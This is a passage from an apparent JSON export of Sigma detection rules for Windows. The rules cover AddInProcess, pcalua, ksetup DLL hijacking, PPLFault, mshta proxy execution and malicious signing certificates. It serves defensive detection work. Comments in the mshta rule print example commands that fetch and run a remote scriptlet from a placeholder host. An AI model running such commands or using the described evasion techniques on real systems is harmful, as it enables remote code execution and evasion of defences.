"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084804Z",
"creation_date": "2026-03-23T11:45:34.084806Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084811Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/Aladdin/tree/main",
"https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_addinprocess_exploit.yml",
"content": "title: AddInProcess.exe Code Execution Detected\nid: d4f15ea4-71e4-4670-8baf-2801a6e000e1\ndescription: |\n Detects the execution of the AddInProcess.exe binary from the .NET Framework, with the '32a91b0f-30cd-4c75-be79-ccbd6345de99' GUID as one of its arguments.\n This can be used by attackers to execute arbitrary code under legitimate processes to hide their traces.\n It is recommended to investigate the processes spawned by the PID contained in the command-line or AddInProcess.exe.\nreferences:\n - https://github.com/nettitude/Aladdin/tree/main\n - https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/09/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'AddInProcess.exe'\n - 'AddInProcess32.exe'\n CommandLine|contains: '/guid:32a91b0f-30cd-4c75-be79-ccbd6345de99'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4f15ea4-71e4-4670-8baf-2801a6e000e1",
"rule_name": "AddInProcess.exe Code Execution Detected",
"rule_description": "Detects the execution of the AddInProcess.exe binary from the .NET Framework, with the '32a91b0f-30cd-4c75-be79-ccbd6345de99' GUID as one of its arguments.\nThis can be used by attackers to execute arbitrary code under legitimate processes to hide their traces.\nIt is recommended to investigate the processes spawned by the PID contained in the command-line or AddInProcess.exe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d50e7dfa-7326-48ae-87cc-cea110b10906",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069569Z",
"creation_date": "2026-03-23T11:45:34.069571Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069576Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/KyleHanslovan/status/912659279806640128",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_indirect_command_execution_pcalua.yml",
"content": "title: Indirect Command Executed via pcalua.exe\nid: d50e7dfa-7326-48ae-87cc-cea110b10906\ndescription: |\n Detects a suspicious execution of pcalua.exe, the legitimate windows Program Compatibility Assistant.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to check for suspicious activities by the newly created process.\nreferences:\n - https://twitter.com/KyleHanslovan/status/912659279806640128\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/01/21\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcalua\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\'\n ParentImage|endswith: '\\pcalua.exe'\n ParentCommandLine|contains: ' -a '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wondershare:\n ParentCommandLine|startswith: '?:\\WINDOWS\\system32\\pcalua.exe -a ?:\\Users\\\\*\\AppData\\Local\\Wondershare\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d50e7dfa-7326-48ae-87cc-cea110b10906",
"rule_name": "Indirect Command Executed via pcalua.exe",
"rule_description": "Detects a suspicious execution of pcalua.exe, the legitimate windows Program Compatibility Assistant.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to check for suspicious activities by the newly created process.\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d512b029-d424-41f5-8d42-4e5ddeb15085",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098741Z",
"creation_date": "2026-03-23T11:45:34.098743Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098747Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ksetup.yml",
"content": "title: DLL Hijacking via ksetup.exe\nid: d512b029-d424-41f5-8d42-4e5ddeb15085\ndescription: |\n Detects potential Windows DLL Hijacking via ksetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ksetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dpx.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d512b029-d424-41f5-8d42-4e5ddeb15085",
"rule_name": "DLL Hijacking via ksetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ksetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5940bab-18fd-4719-b8c3-9f71214f4b62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074655Z",
"creation_date": "2026-03-23T11:45:34.074657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074661Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gabriellandau/PPLFault",
"https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_dll_loaded_related_to_pplfault.yml",
"content": "title: Malicious DLL Loaded Related to PPLFault\nid: d5940bab-18fd-4719-b8c3-9f71214f4b62\ndescription: |\n Detects the suspicious loading of a DLL related to PPLFault.\n PPLFault is a tool that exploits vulnerabilities to bypass LSA protection, terminate or blind EDR software, and modifies kernel memory without the use of any vulnerable drivers.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/gabriellandau/PPLFault\n - https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/01/26\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.PPLFault\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\EventAggregationPH.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5940bab-18fd-4719-b8c3-9f71214f4b62",
"rule_name": "Malicious DLL Loaded Related to PPLFault",
"rule_description": "Detects the suspicious loading of a DLL related to PPLFault.\nPPLFault is a tool that exploits vulnerabilities to bypass LSA protection, terminate or blind EDR software, and modifies kernel memory without the use of any vulnerable drivers.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5a4403b-552a-4e35-8da6-8a73481e966f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088246Z",
"creation_date": "2026-03-23T11:45:34.088248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088252Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_jscript.yml",
"content": "title: Proxy Execution of JScript via mshta.exe\nid: d5a4403b-552a-4e35-8da6-8a73481e966f\ndescription: |\n Mshta can be used to proxy the execution of a malicious VBScript/JScript.\n This script may, in turn, be used to run abritrary code on the infected system.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent suspicious actions stemming from the mshta process itself.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2021/02/10\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n # mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct\").Exec();close();\n selection_bin:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_jscript:\n - CommandLine|contains:\n - 'javascript:'\n - 'vbscript:'\n - 'about:'\n\n exclusion_ivanti:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n\n exclusion_msgbox:\n CommandLine|startswith:\n - 'mshta vbscript:Execute(msgbox'\n - 'mshta.exe vbscript:Execute(msgbox'\n\n exclusion_smartcontrol:\n CommandLine|contains: '?:\\SmartControlBeta\\resources\\bin\\ext\\GLHubUpdateToolCli_ISP.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5a4403b-552a-4e35-8da6-8a73481e966f",
"rule_name": "Proxy Execution of JScript via mshta.exe",
"rule_description": "Mshta can be used to proxy the execution of a malicious VBScript/JScript.\nThis script may, in turn, be used to run abritrary code on the infected system.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent suspicious actions stemming from the mshta process itself.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5b14d8f-5c6d-4e7f-884a-c0f4c1663795",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625773Z",
"creation_date": "2026-03-23T11:45:34.625775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625779Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/pr0xylife/status/1595096438798696448",
"https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware",
"https://twitter.com/ESETresearch/status/1594937059348992001",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_process_malicious_certificate.yml",
"content": "title: Process Executed Signed with Malicious Certificate\nid: d5b14d8f-5c6d-4e7f-884a-c0f4c1663795\ndescription: |\n Detects the execution of files signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the binary for malicious content and to look for suspicious actions on the host.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/pr0xylife/status/1595096438798696448\n - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - https://twitter.com/ESETresearch/status/1594937059348992001\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/21\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://www.virustotal.com/gui/file/f677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541\n - 'C855F7541E50C98A5AE09F840FA06BADB97AB46C'\n # https://www.virustotal.com/gui/file/5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942\n - '686B7EBBA606303B5085633FCAA0685272B4D9B9'\n # 'https://www.virustotal.com/gui/file/dc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620f'\n - '74DF2582AF3780D81A8071E260C2B04259EFC35A'\n # e55ab7a33fc783c6b291f8f3a77615e5db40f157e1e6cff7b3472b0b8acafaf0\n - 'FA6146F1FDAD58B8DB08411C459CB70ACF82846D'\n # 15b195152a07bb22fec82aa5c90c7ff44a10c0303446ce11f683094311a8916b\n - '561620A3F0BF4FB96898A99252B85B00C468E5AF'\n # ef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fef\n - '94EEBFC9A334B52FE42535DD0F2D4B052FB3D3D5'\n # 391417a433d77b2eb838bce25e1e4f3016a260c8231af4280b82c9c021bb468e\n - '5331A2A90EDD8F1E9745832CB6996420C57D605B'\n # https://www.virustotal.com/gui/file/87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d\n - '94C21E6384F2FFB72BD856C1C40B788F314B5298'\n # https://www.elastic.co/security-labs/abyssworker\n - '0786E6A95B9B6FC9495F319AC2E334103AAB292F'\n - '811500AD165F66CAD3E607CD1253A5EDC91CB4D0'\n - 'D01B544CF4A4F901FA496BEA2B3A8F66F9583CB2'\n - '7749BE16F266669D505684E9F002C689706C4295'\n - '00F1435238447BBA9560E2A9A8C781861EBB15BC'\n - 'D36A5F40D62A4CCB0CFF098D0BBFAA30257D487D'\n - 'DA2CFA2262049049A7A2CA8FAF463669F19B8D5F'\n - '45D2D18BCCD270185F012271C1D6B7C890BA7C02'\n - '18760B486C35B6FF79EA5C461313DE2087353FEA'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n # https://www.truesec.com/hub/blog/tamperedchef-the-bad-pdf-editor\n - '99201EEE9807D24851026A8E8884E4C40245FAC7' # GLINT SOFTWARE SDN. BHD.\n - 'A2278EB6A438DC528F3EBFEB238028C474401BEF' # Echo Infini Sdn. Bhd.\n - '29338264019B62D11F9C6C4B5A69B78B899B4DF6' # ECHO INFINI SDN. BHD.\n - '17F77710C888E30917F71F7909086BCC2D131F61' # Byte Media Sdn. Bhd.\n - '7533D9D9C5241D0E031C21304C6A3FF064F79072' # ECHO INFINI SDN. BHD.\n - '3B5253A4853056458675B5CB1903C05BC2DBBD1B' # BLACK INDIGO LTD\n - '76C675514EEC3A27A4E551A77ED30FBB0DC43A01' # Summit Nexus Holdings LLC\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5b14d8f-5c6d-4e7f-884a-c0f4c1663795",
"rule_name": "Process Executed Signed with Malicious Certificate",
"rule_description": "Detects the execution of files signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the binary for malicious content and to look for suspicious actions on the host.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553",
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5bec053-13ac-498d-8233-c20cac8072d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
